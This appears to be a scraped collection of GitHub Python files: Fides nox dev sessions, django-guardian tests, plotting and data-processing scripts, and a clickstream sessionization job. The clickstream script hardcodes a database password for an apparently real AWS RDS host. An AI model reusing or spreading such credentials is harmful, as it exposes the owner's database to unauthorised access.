'nox -s dev -- shell' - also open a shell on the Fides webserver\n 'nox -s dev -- ui' - also build and run the Admin UI\n 'nox -s dev -- pc' - also build and run the Privacy Center\n 'nox -s dev -- remote_debug' - run with remote debugging enabled (see docker-compose.remote-debug.yml)\n 'nox -s dev -- worker' - also run a Fides worker\n 'nox -s dev -- child' - also run a Fides child node\n 'nox -s dev -- ' - also run a test datastore (e.g. 
'mssql', 'mongodb')\n\n Note that you can combine any of the above arguments together, for example:\n 'nox -s dev -- shell ui pc'\n\n See noxfiles/dev_nox.py for more info\n \"\"\"\n\n build(session, \"dev\")\n session.notify(\"teardown\")\n\n if \"worker\" in session.posargs:\n session.run(\"docker\", \"compose\", \"up\", \"--wait\", \"worker\", external=True)\n\n datastores = [\n datastore for datastore in session.posargs if datastore in ALL_DATASTORES\n ] or None\n\n if \"child\" in session.posargs:\n session.run(\n \"docker\",\n \"compose\",\n \"-f\",\n \"docker-compose.child-env.yml\",\n \"up\",\n \"-d\",\n external=True,\n )\n\n if \"ui\" in session.posargs:\n build(session, \"admin_ui\")\n session.run(\"docker\", \"compose\", \"up\", \"-d\", \"fides-ui\", external=True)\n\n if \"pc\" in session.posargs:\n build(session, \"privacy_center\")\n session.run(\"docker\", \"compose\", \"up\", \"-d\", \"fides-pc\", external=True)\n\n open_shell = \"shell\" in session.posargs\n remote_debug = \"remote_debug\" in session.posargs\n if not datastores:\n if open_shell:\n session.run(*START_APP, external=True)\n session.log(\"~~Remember to login with `fides user login`!~~\")\n session.run(*EXEC_IT, \"/bin/bash\", external=True)\n else:\n if remote_debug:\n session.run(*START_APP_REMOTE_DEBUG, external=True)\n else:\n session.run(\n \"docker\", \"compose\", \"up\", COMPOSE_SERVICE_NAME, external=True\n )\n else:\n # Run the webserver with additional datastores\n run_infrastructure(\n open_shell=open_shell,\n run_application=True,\n datastores=datastores,\n remote_debug=remote_debug,\n )\n\n\n@nox_session()\ndef cypress_tests(session: Session) -> None:\n \"\"\"\n End-to-end Cypress tests designed to be run as part of the 'e2e_test' session.\n \"\"\"\n session.log(\"Running Cypress tests...\")\n session.run(*RUN_CYPRESS_TESTS, external=True)\n\n\n@nox_session()\ndef e2e_test(session: Session) -> None:\n \"\"\"\n Spins up the test_env session and runs Cypress E2E tests against it.\n \"\"\"\n session.log(\"Running end-to-end tests...\")\n session.notify(\"fides_env(test)\", posargs=[\"test\"])\n session.notify(\"cypress_tests\")\n session.notify(\"teardown\")\n\n\n@nox_session()\n@parametrize(\n \"fides_image\",\n [\n param(\"dev\", id=\"dev\"),\n param(\"test\", id=\"test\"),\n ],\n)\ndef fides_env(session: Session, fides_image: Literal[\"test\", \"dev\"] = \"test\") -> None:\n \"\"\"\n Spins up a full fides environment seeded with data.\n\n Params:\n dev = Spins up a full fides application with a dev-style docker container. This includes hot-reloading and no pre-baked UI.\n test = Spins up a full fides application with a production-style docker container. This includes the UI being pre-built as static files.\n\n Posargs:\n test = instead of running 'bin/bash', runs 'fides' to verify the CLI and provide a zero exit code\n keep_alive = does not automatically call teardown after the session\n \"\"\"\n\n is_test = \"test\" in session.posargs\n keep_alive = \"keep_alive\" in session.posargs\n\n exec_command = EXEC if any([is_test, keep_alive]) else EXEC_IT\n shell_command = \"fides\" if any([is_test, keep_alive]) else \"/bin/bash\"\n\n # Temporarily override some ENV vars as needed. 
To set local secrets, see 'example.env'\n test_env_vars = {\n \"FIDES__CONFIG_PATH\": \"/fides/src/fides/data/test_env/fides.test_env.toml\",\n }\n\n session.log(\n \"Tearing down existing containers & volumes to prepare test environment...\"\n )\n try:\n session.run(*COMPOSE_DOWN_VOLUMES, external=True, env=test_env_vars)\n except CommandFailed:\n session.error(\n \"Failed to cleanly teardown existing containers & volumes. Please exit out of all other and try again\"\n )\n if not keep_alive:\n session.notify(\"teardown\", posargs=[\"volumes\"])\n\n session.log(\"Building images...\")\n build(session, fides_image)\n build(session, \"admin_ui\")\n build(session, \"privacy_center\")\n\n session.log(\n \"Starting the application with example databases defined in docker-compose.integration-tests.yml...\"\n )\n session.run(\n *START_TEST_ENV, \"fides-ui\", \"fides-pc\", external=True, env=test_env_vars\n )\n session.log(\"Logging in...\")\n session.run(*LOGIN, external=True)\n\n session.log(\n \"Running example setup scripts for DSR Automation tests... (scripts/load_examples.py)\"\n )\n session.run(\n *EXEC,\n \"python\",\n \"/fides/scripts/load_examples.py\",\n external=True,\n env=test_env_vars,\n )\n\n session.log(\n \"Pushing example resources for Data Mapping tests... (demo_resources/*)\"\n )\n session.run(\n *EXEC,\n \"fides\",\n \"push\",\n \"demo_resources/\",\n external=True,\n env=test_env_vars,\n )\n\n # Make spaces in the info message line up\n title = (\n \"FIDES TEST ENVIRONMENT\" if fides_image == \"test\" else \"FIDES DEV ENVIRONMENT \"\n )\n\n session.log(\"****************************************\")\n session.log(\"* *\")\n session.log(f\"* {title} *\")\n session.log(\"* *\")\n session.log(\"****************************************\")\n session.log(\"\")\n # Print out some helpful tips for using the test_env!\n # NOTE: These constants are defined in scripts/setup/constants.py, docker-compose.yml, and docker-compose.integration-tests.yml\n session.log(\n \"Using secrets set in '.env' for example setup scripts (see 'example.env' for options)\"\n )\n if fides_image == \"test\":\n session.log(\n \"Fides Admin UI (production build) running at http://localhost:8080 (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Run 'fides user login' to authenticate the CLI (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Fides Admin UI (dev) running at http://localhost:3000 (user: 'root_user', pass: 'Testpassword1!')\"\n )\n session.log(\n \"Fides Privacy Center (production build) running at http://localhost:3001 (user: 'jane@example.com')\"\n )\n session.log(\n \"Example Postgres Database running at localhost:6432 (user: 'postgres', pass: 'postgres', db: 'postgres_example')\"\n )\n session.log(\n \"Example Mongo Database running at localhost:27017 (user: 'mongo_test', pass: 'mongo_pass', db: 'mongo_test')\"\n )\n session.log(\"Opening Fides CLI shell... 
(press CTRL+D to exit)\")\n if not keep_alive:\n session.run(*exec_command, shell_command, external=True, env=test_env_vars)\n\n\n@nox_session()\ndef quickstart(session: Session) -> None:\n \"\"\"Run the quickstart tutorial.\"\"\"\n build(session, \"dev\")\n build(session, \"privacy_center\")\n build(session, \"admin_ui\")\n session.notify(\"teardown\")\n run_infrastructure(datastores=[\"mongodb\", \"postgres\"], run_quickstart=True)\n","repo_name":"AbdoALPOP/fides","sub_path":"noxfiles/dev_nox.py","file_name":"dev_nox.py","file_ext":"py","file_size_in_byte":9015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"72258989981","text":"__author__ = 'Toni'\n\nimport numpy as np\nimport numpy.random as rnd\nfrom PyQt4.QtCore import QString, QTimer, Qt\nfrom PyQt4.QtGui import *\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlibwidget import MatplotlibWidget\nfrom cromatogram_w import Ui_CromWindow\nfrom trasmission import color2str, generate_colors\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QApplication.UnicodeUTF8\n\n\n def _translate(context, text, disambig):\n return QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QApplication.translate(context, text, disambig)\n\n\nclass Cromatogram(QMainWindow):\n def __init__(self, parent, tmodel):\n QMainWindow.__init__(self, parent)\n self.ui = Ui_CromWindow()\n self.ui.setupUi(self)\n self.tmodel = tmodel\n\n # Creates the matplotlib window and the toolbar\n self.mpl_window = MatplotlibWidget()\n self.ui.vl_plot.addWidget(self.mpl_window)\n self.toolbar = NavigationToolbar(self.mpl_window, self)\n self.ui.vl_plot.addWidget(self.toolbar)\n self.color_list = generate_colors(self.tmodel.num_analites)\n # Plot the models\n conc = self.simulate()\n self.plot(conc)\n\n def simulate(self):\n \"\"\" This function simulate the exit of each analito through the column. \"\"\"\n full_concentration = 0.998\n\n tmodel = self.tmodel\n\n if not tmodel.is_ideal_type:\n full_concentration = 0.5\n\n last_plate_conc = np.zeros(tmodel.num_analites)\n\n concentration = []\n for i in np.arange(tmodel.num_analites):\n concentration.append([])\n\n k = 0\n while True:\n tmodel.max_iter += 1\n tmodel.update(1)\n\n for i in np.arange(tmodel.num_analites):\n # amount of concentration in last plate\n aux = tmodel.current_state[4][i][tmodel.num_teo_plates - 1]\n last_plate_conc[i] += aux\n concentration[i].append(aux)\n\n flag = True\n for i in np.arange(tmodel.num_analites):\n if last_plate_conc[i] < full_concentration * tmodel.conc_initial[i]:\n flag = False\n\n if flag:\n # print last_plate_conc\n # print tmodel.conc_initial\n break\n\n k += 1\n\n return k + 1, concentration\n\n def plot(self, concentrations):\n\n for i in np.arange(self.tmodel.num_analites):\n self.mpl_window.axes.set_xlabel(\"Numero de Iteraciones\")\n self.mpl_window.axes.set_ylabel(\"Concentracion\")\n # print concentrations[0], len(concentrations[i + 1])\n self.mpl_window.axes.plot(np.arange(concentrations[0]), concentrations[1][i], color2str(self.color_list[i]),\n label=str(chr(65 + i)))\n self.mpl_window.axes.hold(True)\n\n self.mpl_window.axes.grid()\n self.mpl_window.axes.legend()\n self.mpl_window.draw()\n","repo_name":"tonypg39/spatcc","sub_path":"cromatogram.py","file_name":"cromatogram.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18818510039","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User, Group, Permission\n\nfrom guardian.shortcuts import get_perms_for_model\nfrom guardian.core import ObjectPermissionChecker\nfrom guardian.shortcuts import assign, remove_perm, get_perms, get_users_with_perm\nfrom guardian.exceptions import NotUserNorGroup\n\nfrom guardian.tests.models import Keycard\nfrom guardian.tests.core_test import ObjectPermissionTestCase\n\nclass ShortcutsTests(TestCase):\n fixtures = ['tests.json']\n\n def setUp(self):\n self.user = User.objects.get(username='jack')\n self.group = Group.objects.get(name='admins')\n\n def test_get_perms_for_model(self):\n self.assertEqual(get_perms_for_model(self.user).count(), 3)\n self.assertTrue(list(get_perms_for_model(self.user)) ==\n list(get_perms_for_model(User)))\n self.assertEqual(get_perms_for_model(Permission).count(), 3)\n\n model_str = 'guardian.Keycard'\n self.assertEqual(\n sorted(get_perms_for_model(model_str).values_list()),\n sorted(get_perms_for_model(Keycard).values_list()))\n key = Keycard()\n self.assertEqual(\n sorted(get_perms_for_model(model_str).values_list()),\n sorted(get_perms_for_model(key).values_list()))\n\nclass AssignTest(ObjectPermissionTestCase):\n \"\"\"\n Tests permission assigning for user/group and object.\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, assign,\n perm=\"change_object\",\n user_or_group=\"Not a Model\",\n obj=self.keycard)\n\n def test_user_assign(self):\n assign(\"change_keycard\", self.user, self.keycard)\n assign(\"change_keycard\", self.group, self.keycard)\n self.assertTrue(self.user.has_perm(\"change_keycard\", self.keycard))\n\n def test_group_assing(self):\n assign(\"change_keycard\", self.group, self.keycard)\n assign(\"delete_keycard\", self.group, self.keycard)\n\n check = ObjectPermissionChecker(self.group)\n self.assertTrue(check.has_perm(\"change_keycard\", self.keycard))\n self.assertTrue(check.has_perm(\"delete_keycard\", self.keycard))\n\nclass RemovePermTest(ObjectPermissionTestCase):\n \"\"\"\n Tests object permissions removal.\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, remove_perm,\n perm=\"change_object\",\n user_or_group=\"Not a Model\",\n obj=self.keycard)\n\n def test_user_remove_perm(self):\n # assign perm first\n assign(\"change_keycard\", self.user, self.keycard)\n remove_perm(\"change_keycard\", self.user, self.keycard)\n self.assertFalse(self.user.has_perm(\"change_keycard\", self.keycard))\n\n def test_group_remove_perm(self):\n # assign perm first\n assign(\"change_keycard\", self.group, self.keycard)\n remove_perm(\"change_keycard\", self.group, self.keycard)\n\n check = ObjectPermissionChecker(self.group)\n self.assertFalse(check.has_perm(\"change_keycard\", self.keycard))\n\nclass GetPermsTest(ObjectPermissionTestCase):\n \"\"\"\n Tests get_perms function (already done at core tests but left here as a\n placeholder).\n \"\"\"\n def test_not_model(self):\n self.assertRaises(NotUserNorGroup, get_perms,\n user_or_group=None,\n obj=self.keycard)\n\n def test_user(self):\n perms_to_assign = (\"change_keycard\",)\n\n for perm in perms_to_assign:\n assign(\"change_keycard\", self.user, self.keycard)\n\n perms = get_perms(self.user, self.keycard)\n for perm in perms_to_assign:\n self.assertTrue(perm in perms)\n\n\nclass GetUsersWithPerm(ObjectPermissionTestCase):\n def test_get_users_with_perm(self):\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n 
self.assertEqual(users, [])\n\n assign(\"change_keycard\", self.group, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users, [self.user])\n\n john = User.objects.create(username='John')\n assign(\"add_keycard\", john, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users, [self.user])\n\n assign(\"change_keycard\", john, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john].sort())\n\n mary = User.objects.create(username='Mary')\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john].sort())\n\n mary.groups.add(self.group)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john, mary].sort())\n\n assign(\"change_keycard\", mary, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john, mary].sort())\n\n","repo_name":"canassa/django-guardian","sub_path":"guardian/tests/shortcuts_test.py","file_name":"shortcuts_test.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"70766643099","text":"import csv\n\ninp = []\ncss = {}\nejs = {}\n\nwith open('NeuronConnectOrig.csv', 'r') as f:\n reader = csv.reader(f)\n next(reader, None)\n inp = [row for row in reader]\n\n\nfor row in inp:\n #print(row)\n if row[2] == \"EJ\":\n if (row[0], row[1]) in ejs:\n ejs[(row[0], row[1])] += int(row[3])\n else:\n ejs[(row[0], row[1])] = int(row[3])\n if (row[2] == \"S\" or row[2] == \"Sp\"):\n if (row[0], row[1]) in css:\n css[(row[0], row[1])] += int(row[3])\n else:\n css[(row[0], row[1])] = int(row[3])\n\n#EJs are back and forth connections\nfor ej in ejs:\n if (ej[1], ej[0]) not in ejs:\n print(ej)\n\nwith open('edges_wo_muscles.csv', 'a') as f:\n f.write(\"Neuron 1,Neuron 2,Type,Nbr\\n\")\n for key,value in ejs.items():\n to_write = key[0] + \";\" + key[1] + \";EJ;\" + str(value) + \"\\n\"\n f.write(to_write)\n\n for key,value in css.items():\n to_write = key[0] + \";\" + key[1] + \";CS;\" + str(value) + \"\\n\"\n f.write(to_write)\n","repo_name":"hellothisisnathan/Mouse_Controllability","sub_path":"Celegans/hungarian dude's code/data/generate_edges_wo_muscles.py","file_name":"generate_edges_wo_muscles.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4087290004","text":"from drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg.openapi import Parameter, IN_QUERY\nclass PostSwagger:\n def __init__(self, params, required, summary, description=None, examples_={\n \"application/json\": {\n \"gcode\": 0,\n \"success\": True,\n \"data\" : \"\"\n }\n }):\n self.params = {}\n for p in params:\n self.params[p] = openapi.Schema(type=params[p])\n self.req = openapi.Schema(type=openapi.TYPE_OBJECT, properties=self.params,required=required)\n self.res = {\n \"200\": openapi.Response(\n description=\"성공\",\n examples=examples_\n )\n }\n self.summary = summary\n self.description = description\n\n def get_auto_schema(self):\n return swagger_auto_schema(\n operation_summary=self.summary,\n operation_description=self.description,\n request_body=self.req,\n responses=self.res,\n )\n\nclass GetSwagger:\n def __init__(self, params, examples_, summary, description=None):\n self.params = []\n for p in params:\n self.params.append(Parameter(p, IN_QUERY, type=params[p]))\n \n self.res = {\n \"200\" : openapi.Response(\n description=\"성공\",\n examples=examples_\n )\n }\n self.summary = summary\n self.description = description\n \n def get_auto_schema(self):\n return swagger_auto_schema(\n operation_summary=self.summary, \n operation_description=self.description,\n manual_parameters=self.params,\n responses=self.res\n )","repo_name":"AgongKim/type16","sub_path":"utils/swagger_base.py","file_name":"swagger_base.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"496032461","text":"import pandas as pd\nimport sqlalchemy as sql\nimport logging\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\n# details of the database.\nDB_HOST = 'terraform-20191101073604464400000001.cqpira9yntzj.ap-southeast-1.rds.amazonaws.com'\nDB_USER = 'foo'\nDB_PASS = 'foobarbaz'\nDB_NAME = 'marketing'\n\n\n# return session datetime from session_id.\ndef session_datetime_from_session_id(session_id):\n session_id_split = session_id.split('_')\n return datetime.strptime(session_id_split[1] + ' ' + session_id_split[2], '%Y%m%d %H%M')\n\n\n# returns a datetime object from visit_date and visit_time details.\ndef create_datetime(v_date, v_time):\n return datetime.strptime(v_date + ' ' + v_time, '%Y%m%d %H:%M %p')\n\n\n# returns session_id given device_id, visit_date, and visit_time.\n# i_ prefix to denote inner variable.\ndef create_new_session_id(i_device_id, i_visit_date, i_visit_time):\n return 's{0}_{1}_{2}'.format(i_device_id, i_visit_date, i_visit_time.replace(':', '')[0:4])\n\n\n# updates session_id in the database.\ndef update_session_id_for_row(i_session_id, i_row_id, i_sql_engine):\n connection = i_sql_engine.connect()\n connection.execute('update clickstream set session_id = \\'{0}\\' where id = \\'{1}\\''.format(i_session_id, i_row_id))\n\n\n# returns a dataframe row containing existing sessions for a device_id.\ndef sessions_for(device_id, i_sql_engine):\n sessions_for_device_query = '''\n select device_id, session_id, visit_date, visit_time \n from clickstream where device_id = \\'{0}\\' \n and session_id is not null'''.format(device_id)\n sessions_for_device_df = pd.read_sql_query(sessions_for_device_query, i_sql_engine)\n return sessions_for_device_df\n\n\n# return last session.\ndef last_session_from_sessions(sessions):\n sessions['visit_datetime'] = sessions.apply(lambda x: create_datetime(x['visit_date'], x['visit_time']), axis=1)\n sessions_sorted = sessions.sort_values(by='visit_datetime', ascending=False)\n return sessions_sorted.iloc[0]\n\n\n# row is one row of a dataframe.\ndef process_row(row, i_sql_engine):\n row_id = row['id']\n device_id = row['device_id']\n visit_date = row['visit_date']\n visit_time = row['visit_time']\n visit_datetime = create_datetime(visit_date, visit_time)\n\n logging.info('Processing row with ID: {0}'.format(row_id))\n sessions_for_device = sessions_for(device_id, i_sql_engine)\n\n # if there is no session in the database for that device_id, then create new session.\n if sessions_for_device.empty:\n session_id = create_new_session_id(device_id, visit_date, visit_time)\n update_session_id_for_row(session_id, row_id, i_sql_engine)\n\n else:\n # get latest existing session.\n latest_session_id = last_session_from_sessions(sessions_for_device)['session_id']\n latest_session_datetime = session_datetime_from_session_id(latest_session_id)\n\n # if still within the previous session time window, then use the previous session id.\n if latest_session_datetime + timedelta(minutes=60) > visit_datetime:\n update_session_id_for_row(latest_session_id, row_id, i_sql_engine)\n\n # if not within the previous session time window, then create a new session id.\n else:\n new_session_id = create_new_session_id(device_id, visit_date, visit_time)\n update_session_id_for_row(new_session_id, row_id, i_sql_engine)\n\n\n# main method.\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n connect_string = 'mysql+mysqlconnector://{0}:{1}@{2}/{3}'.format(DB_USER, DB_PASS, DB_HOST, DB_NAME)\n sql_engine = 
sql.create_engine(connect_string)\n\n df = pd.read_sql_query('select * from clickstream where session_id is null', sql_engine)\n for i in range(len(df)):\n process_row(df.iloc[i], sql_engine)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"devacto/lzd","sub_path":"qn-one/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7384622066","text":"# -*-coding:utf-8-*-\n# created by HolyKwok 201610414206\n# 空气质量数据可视化\n\nimport pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties\n\n# 读取数据\ndata = pd.read_csv(\"pollution.csv\") # 默认header=True,首航作为列名\n# 1-求PM2.5和气温日平均\n# 数据预处理\nyears = list(set(data['year'])) # 年分表\nmonths = list(range(1, 13))\n# days = list(range(1, 32))\n# every_day = [(m, d) for m in months for d in days ]\n# # 求平均值,自动过滤NaN\n# pm2d5_days = []\n# temp_days = []\n# for y in years:\n# # 每年的每个月有哪天\n# list(map(pm2d5_days.append, list(map(lambda x: data.loc[(data['year'] == y) & (data['month'] == x[0]) & (data['day'] == x[1]) & (data['pm2.5'].notnull())]['pm2.5'].mean(), every_day))))\n# list(map(temp_days.append, list(map(lambda x: data.loc[(data['year'] == y) & (data['month'] == x[0]) & (data['day'] == x[1]) & (data['TEMP'].notnull())]['TEMP'].mean(), every_day))))\n# # 画图\n# font = FontProperties(fname=\"C:\\Windows\\Fonts\\msyh.ttc\", size=15) # 设置字体\n# fig = plt.figure() # 创建子图\n# pm2d5_ax = fig.add_subplot(2, 1, 1)\n# temp_ax = fig.add_subplot(2, 1, 2)\n# bar_with = 0.5 # 柱状条宽度\n# index = np.arange(len(years)* len(months) * len(days)) # 下标序列\n# pm2d5_ax.bar(index, pm2d5_days, bar_with, label='PM2.5')\n# temp_ax.bar(index, temp_days, bar_with, label='TEMP')\n# # 标题\n# pm2d5_ax.set_title(u'每年pm2.5日平均统计表', fontproperties = font)\n# temp_ax.set_title(u'每年气温日平均统计表', fontproperties = font)\n# pm2d5_ax.set_xlabel(u'日期', fontproperties = font)\n# pm2d5_ax.set_ylabel(u'平均值', fontproperties = font)\n# temp_ax.set_xlabel(u'日期', fontproperties = font)\n# temp_ax.set_ylabel(u'平均值', fontproperties = font)\n# pm2d5_ax.set_xticks([])\n# temp_ax.set_xticks([])\n# plt.show()\n# plt.close()\npm2d5_y_avg = [] # pm2.5各年平均值\ntemp_y_avg = [] # 气温各年平均值\nlist(map(pm2d5_y_avg.append, list(map(lambda x: data.loc[data['year'] == x]['pm2.5'].mean(), years))))\nlist(map(temp_y_avg.append, list(map(lambda x: data.loc[data['year'] == x]['TEMP'].mean(), years))))\n# 画图\nfont = FontProperties(fname=\"C:\\Windows\\Fonts\\msyh.ttc\", size=15) # 设置字体\nindex = np.arange(len(years))\nbar_width = 0.35\nplt.bar(index, pm2d5_y_avg, bar_width, label='pm2.5')\nplt.bar(index + bar_width, temp_y_avg, bar_width, label='temp')\nplt.title(u\"pm2.5和气温年日平均\", fontproperties = font)\nplt.xticks(index, years)\nplt.ylabel(u\"日均值\", fontproperties = font)\n\n# 2-求五年的PM2.5,气温,气压,累计降雨量趋势图\n# 数据预处理,清除NA\npm2d5_data = data.loc[data['pm2.5'].notnull()] # isnull()和notnull()返回布尔型\ntemp_data = data.loc[data['TEMP'].notnull()]\npres_data = data.loc[data['PRES'].notnull()]\niws_data = data.loc[data['Iws'].notnull()]\n# 画图\nfig = plt.figure()\n# 添加子图\npm2d5_ax = fig.add_subplot(2, 2, 1)\ntemp_ax = fig.add_subplot(2, 2, 2)\npres_ax = fig.add_subplot(2, 2, 3)\niws_ax = fig.add_subplot(2, 2, 4)\n# 向子图中添加数据\npm2d5_ax.plot(pm2d5_data['pm2.5'], \"-\", linewidth=0.2)\ntemp_ax.plot(temp_data['TEMP'], \"-\", linewidth=0.2)\npres_ax.plot(pres_data['PRES'], \"-\", linewidth=0.2)\niws_ax.plot(iws_data['Iws'], \"-\", linewidth=0.2)\n# 隐藏x轴刻度\npm2d5_ax.set_xticks([])\ntemp_ax.set_xticks([])\npres_ax.set_xticks([])\niws_ax.set_xticks([])\n# 设置标题\npm2d5_ax.set_title('pm2.5')\ntemp_ax.set_title('TEMP')\npres_ax.set_title('PRES')\niws_ax.set_title('Iws')\nplt.show()\nplt.close()\n\n# 3-统计每年PM2.5指数平均值最高的5个月,获取每天的PM2.5指数\n# 数据预处理\npm2d5_m_avg = []\nfor m in months:\n # 每年的m月平均pm2.5,注意筛选条件用括号分隔避免歧义(ambiguous)\n pm2d5_m_avg.append(list(map(lambda x: (m, data.loc[(data['year'] == x) & 
(data['month'] == m) & (data['pm2.5'].notnull())]['pm2.5'].mean()), years)))\n# 转置结果,\npm2d5_m_avg_T = [[row[col] for row in pm2d5_m_avg] for col in range(len(pm2d5_m_avg[0]))] # 转置\n# 进行每年的前五排序切片\npm2d5_m_avg_top5 = list(map(lambda x: sorted(x, key=lambda x: x[1], reverse=True)[:5], pm2d5_m_avg_T))\n# 按升序排列月份以便计算\npm2d5_m_avg_top5 = list(map(lambda x: sorted(x, key=lambda x: x[0]), pm2d5_m_avg_top5))\npm2d5_d_data = []\nfor i, l in enumerate(pm2d5_m_avg_top5): # 筛选每年每月的数据[y:[m:...], y:[m:...]...]\n pm2d5_d_data.append(list(map(lambda x: data.loc[(data['year'] == years[i]) & (data['month'] == x[0]) & (data['pm2.5'].notnull())], l)))\n# 画图\nplt.rcParams['figure.figsize'] = (10.0, 1.0) # 图片长宽比例\nplt.rcParams['savefig.dpi'] = 500 # 图片像素\nplt.rcParams['figure.dpi'] = 400 # 分辨率\n\nfor n, dl in enumerate(pm2d5_d_data): # 按一年组建x, y坐标\n x_data = []\n y_data = []\n for e in dl:\n # x为时间(天)\n list(map(x_data.append,list(map(lambda y, m, d, h: str(datetime.datetime(int(y), int(m), int(d), int(h))), e['year'], e['month'], e['day'], e['hour']))))\n # y为PM2.5值\n list(map(y_data.append, list(e['pm2.5'])))\n plt.plot(x_data, y_data, \"-\", linewidth=0.2)\nplt.xticks([]) # 隐藏x轴刻度\nplt.yticks(range(0, 1200, 50)) # 设置y轴刻度\nplt.tick_params(labelsize=3) # 设置刻度字体大小\nplt.show()\nplt.close()","repo_name":"ApplauseWow/IT_new_technique_assignment","sub_path":"practice2/practice2-1.py","file_name":"practice2-1.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34069077744","text":"# TABLE_CONTENTS.PY - Contains code to create tables displaying data\n\nfrom dash import dash_table\n\ndata_table = dash_table.DataTable(\n id='data-table',\n columns=[], # Specifies the table's columns, empty for now as it will be set using a callback function\n data=[], # Specifies the table's columns, empty for now as it will be set using a callback function\n fixed_rows={'headers': True }, # Headers will appear at the top of the table, even when scrolling\n style_table={ # CSS style parameters, which affect the table's appearance\n 'minHeight': '11vh'\n , 'height': '11vh'\n , 'maxHeight': '11vh'\n , 'overflow-y': 'scroll'\n , 'border': '1.5px solid #000000'\n , 'color': '#000000'\n , 'font-size': '15px'\n , 'display': 'inline-block'\n },\n style_cell={ # Affects formatting of the table's cells\n 'textAlign': 'left'\n , 'font-family': 'Arial'\n },\n style_header={ # Affects the styling of table headers\n 'fontWeight': 'bold'\n , 'whiteSpace': 'normal'\n , 'height': 'auto'\n },\n style_data={\n 'whiteSpace': 'normal'\n , 'height': 'auto'\n },\n style_cell_conditional=[ # Conditional styling can be applied, like setting column width conditional on column name\n {'if': {'column_id': 'Hello World'},\n 'width': '100%'}\n ]\n)","repo_name":"MarkVersteegh/dash-template","sub_path":"layout/table_contents.py","file_name":"table_contents.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32728188069","text":"class DetectSquares:\n\n def __init__(self):\n self.coordinateCount = defaultdict(int) # (x,y) = count\n self.points = []\n \n\n def add(self, point: List[int]) -> None:\n x, y = point\n self.coordinateCount[(x, y)] += 1\n self.points.append([x,y])\n \n\n def count(self, point: List[int]) -> int:\n x, y = point\n res = 0\n for px, py in self.points:\n if (abs(py - y) != abs(px - x)) or px == x or py == y :\n continue\n res += self.coordinateCount[(x,py)] * self.coordinateCount[(px,y)]\n \n return res\n \n \n\n\n# Your DetectSquares object will be instantiated and called as such:\n# obj = DetectSquares()\n# obj.add(point)\n# param_2 = obj.count(point)","repo_name":"mwinailan/LeetCode","sub_path":"2013-detect-squares/2013-detect-squares.py","file_name":"2013-detect-squares.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1472564333","text":"## build alternative ancestral sequences\n\nfrom fasta2seq import *\nfrom itertools import product\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nimport json,random\n\nfp = open('spr_all.prob.json','r')\nprob = json.load(fp)\nnumseq = 1000\n#mutations = 30\n\nnodes = pd.read_csv('anc.node.txt')\nnodes = dict(zip(nodes['node'],nodes['name']))\n\n#nodes = {\"471\":\"Drosophila\"}\n#nodes = {\"471\":\"Drosophila\"}\n#471,Drosophila\n#435,Diptera\n#369,Insecta\n#312,Arthropoda\n#255,Metazoa\n#nodes = {\"435\":\"Diptera\"}\n\nfor node in nodes:\n sequence = {}\n name = nodes[node]\n node = str(node)\n print(node,name)\n\n ## all of the alternative residues ##\n alternative_residues = []\n for res_idx in prob[node]:\n alt_res = [res for res in prob[node][res_idx]]\n alternative_residues.append(alt_res)\n\n ## random sample 100 sequences ##\n N = 0\n index_list = []\n while N 1:\n #print(prob[node][res_idx])\n residues_with_ALT.append(res_idx)\n\n print(len(residues_with_ALT))\n #print(residues_with_ALT)\n\n mutations = int(len(residues_with_ALT)/2)\n residues_to_mutate = 